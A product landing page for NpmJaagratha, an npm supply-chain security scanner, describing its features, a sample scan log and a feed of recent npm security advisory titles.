Every commit. Every push. Every dependency change.
Automatically scan your Node.js projects for vulnerabilities, malware packages, leaked secrets, and supply chain attacks. Paste package.json to get an instant risk summary without login.
You ship code. We make sure itโs clean.
Different tools solve different security problems. NpmJaagratha focuses on malware-like behavior, drainers, obfuscation, sketchy scripts, and supply-chain risks, not just known CVEs.
[scan] repo connected from GitHub App
[scan] package-lock parsed, 42 dependencies mapped
[alert] 1 suspicious install script isolated
[alert] exposed token signature matched entropy rule
[result] risk score adjusted to 73/100
Built for developers who want a fast, no-login risk check.
A premium security layer for npm projects, tuned for developers who want strong signals without noise and a clean paste-in workflow.
Vulnerability Scanning
Track known CVEs across every dependency update.
Secret Detection
Catch exposed API keys, tokens, and env leaks early.
Supply Chain Protection
Spot compromised packages and risky maintainer paths.
Malware Package Detection
Flag suspicious install scripts and malicious payloads.
Dependency Risk Scoring
Rank packages by trust signals and exploitability.
GitHub PR Security Checks
Comment on pull requests with precise remediation.
A clean flow from pasted package.json to instant protection.
The flow stays simple. The signal stays strong. Your team gets security context where it matters most.
Paste package.json
Drop in a package.json file or snippet and start the scan instantly.
Push code
Every push, PR, and lockfile change becomes a security checkpoint.
Automatic scans run
NpmJaagratha checks dependencies, scripts, and secrets in real time.
Get instant alerts and fixes
Receive actionable comments, dashboards, and risk scores.
Deep checks for every package move.
Risk moves with every commit.
LATEST NPM VULNERABILITIES
Real-time feed of reviewed security advisories affecting the npm ecosystem, sourced from the GitHub Advisory Database.
GHSA-38m6-82c8-4xfm
Parse Server pre-authentication denial of service via client version header regex backtracking
GHSA-q8mj-m7cp-5q26
qs stringify crash on null and undefined entries in comma-format arrays
GHSA-j3vx-cx2r-pvg8
Network-AI unauthenticated cross-origin MCP tool invocation via empty default secret
GHSA-f396-4rp4-7v2j
Boxlite path traversal leading to arbitrary file write on the host
Reviewed advisories are streamed from NPMSCanโs RSS feed and can be surfaced inside the product feed view.
Use this section for high-signal alerts, release notes, and the latest ecosystem-wide risk changes.
Subtle cultural touch. Premium security tone.
event-stream-like behavior flagged in the latest tree update.
A newly introduced package has an unusual install script and low trust signals.
Lockfile diff reviewed. No secret leaks and no suspicious postinstall scripts.
Paste a package.json and get a risk summary in seconds.
No install, no login, no API keys. Start with a package.json snippet or file, and NpmJaagratha flags vulnerable dependencies, drainers, suspicious scripts, and supply-chain attacks immediately.